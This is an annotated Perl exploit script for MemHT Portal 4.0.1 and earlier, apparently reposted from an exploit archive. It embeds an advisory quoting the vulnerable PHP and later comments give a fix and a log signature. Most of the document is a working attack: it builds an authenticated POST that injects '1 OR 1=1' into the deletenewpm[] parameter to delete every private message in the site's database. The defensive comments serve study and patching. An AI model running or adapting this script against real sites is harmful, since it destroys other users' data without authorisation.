==================================================================
MemHT Portal <= 4.0.1 (pvtmsg) Delete All Private Messages Exploit
==================================================================
#!/usr/bin/perl
# MemHT Portal <= 4.0.1 (pvtmsg) Delete All Private Messages Exploit
# NOTE(review): the script runs without `use strict; use warnings;`, so
# undeclared globals and uninitialised values pass silently.
# The heredoc below is a bare string evaluated in void context: it is
# never printed and only serves as an embedded advisory. It quotes the
# affected PHP (pvtmsg/index.php, lines 851-867 per the advisory), where
# each $_POST array element is interpolated straight into a DELETE
# statement, and gives the author's remedy of casting the value with
# intval(); a prepared statement with a bound integer parameter is the
# equivalent modern fix.
<<Details;
Note:
1- works regardless of php.ini settings.
2- blind sql injection benchmark() method is possible.
3- don't add me on msn messenger.
4- Thanks to evilsocket && Sir Dark.
5- MemHT is a good content management system but it has some security problem.
/pages/pvtmsg/index.php / Line: 851 -867
<?php
}
break;
case "deleteSelected":
if (isset($_POST['deletenewpm'])) {
foreach ($_POST['deletenewpm'] as $value) {
$dblink->query("DELETE FROM memht_pvtmsg WHERE id=$value");
}
}
if (isset($_POST['deletepm'])) {
foreach ($_POST['deletepm'] as $value) {
$dblink->query("DELETE FROM memht_pvtmsg WHERE id=$value");
}
}
?>
ok then foreach ($_POST['deletenewpm'] as $value)
deletenewpm[]= $value ;) so if we send a evil code like this:
1 OR 1=1 we'll delete all messages from mysql database
Possible Fix:
Line: 859 && 864
Edit $dblink->query("DELETE FROM memht_pvtmsg WHERE id=$value");
Fix: $dblink->query("DELETE FROM memht_pvtmsg WHERE id=".intval($value));
regards :)
Details
use IO::Socket;
use Digest::MD5('md5_hex');
# Script-wide globals: `our` is used so that cookies() below can read
# (and, as written, overwrite) $id, $username and $password.
our ($host,$path,$id,$username,$password) = @ARGV;
# Usage banner on a wrong argument count. The check runs after the list
# assignment above, so the globals may already be partly populated.
if (@ARGV != 5) {
print "\n+--------------------------------------------------------------------+\r",
"\n| MemHT Portal <= 4.0.1 (pvtmsg) Delete All Private Messages Exploit |\r",
"\n+--------------------------------------------------------------------+\r",
"\nby yeat - staker[at]hotmail[dot]it\n",
"\nUsage + perl $0 [host] [path] [id] [username] [password]\r",
"\nHost + localhost\r",
"\nPath + /MemHT\r",
"\nID + your user id\r",
"\nPassword + your password\n";
exit;
}
else {
# Response buffer; stays undef if the server sends nothing back.
my $html = undef;
# Plain TCP to port 80 (no TLS). Indirect-object `new Class(...)` syntax
# is discouraged in modern Perl in favour of IO::Socket::INET->new(...).
my $sock = new IO::Socket::INET(
PeerAddr => $host,
PeerPort => 80,
Proto => 'tcp',
) or die $!;
# Form body. The hex escapes spell the literal string "1 OR 1=1", sent as
# the deletenewpm[] array parameter that the advisory above shows being
# interpolated unescaped into a DELETE statement. For defenders, a SQL
# expression in this parameter of a POST to page=pvtmsg&op=deleteSelected
# is the request-log signature of this issue; the application-side fix
# is to cast the id to an integer or bind it as a query parameter.
my $post = "deletenewpm[]=\x31\x20\x4F\x52\x20\x31\x3D\x31".
"&Submit.x=34".
"&Submit.y=9";
# Cookie header value built from MD5 digests of the supplied credentials.
my $auth = cookies();
# Hand-assembled HTTP/1.1 request. Content-Length covers only $post, and
# the "Connection: close" line is appended after the body, so presumably
# a server reads it as stray bytes after the request rather than as a
# header.
my $data = "POST /$path/index.php?page=pvtmsg&op=deleteSelected HTTP/1.1\r\n".
"Host: $host\r\n".
"User-Agent: Lynx (textmode)\r\n".
"Cookie: $auth\r\n".
"Content-Type: application/x-www-form-urlencoded\r\n".
"Content-Length: ".length($post)."\r\n\r\n$post\r\n\r\n".
"Connection: close\r\n\r\n";
$sock->send($data);
# Read the response until the server closes the connection.
while (<$sock>) {
$html .= $_;
}
# "Success" is inferred only from the phrase "Private Messages" appearing
# anywhere in the response, so this does not confirm that any row was
# affected.
if ($html =~ /Private Messages/i) {
print "Exploit successfull,all messages deleted.\n";
}
else {
print "Exploit failed!\n";
}
}
# Build the login cookie value from the globals set from @ARGV.
# Side effect: $username and $password are replaced in place by their
# MD5 hex digests, so a second call would hash the digests again.
# The "login_user=<id>#<md5 user>#<md5 pass>" layout is what this script
# sends; whether it matches the portal's actual cookie format cannot be
# verified from this file. If it does, the portal's session token is
# derived from unsalted MD5 of the credentials, which is a separate
# weakness worth fixing on the application side.
sub cookies
{
$username = md5_hex($username);
$password = md5_hex($password);
return "login_user=$id#$username#$password";
}
# 0day.today [2018-02-16] #Data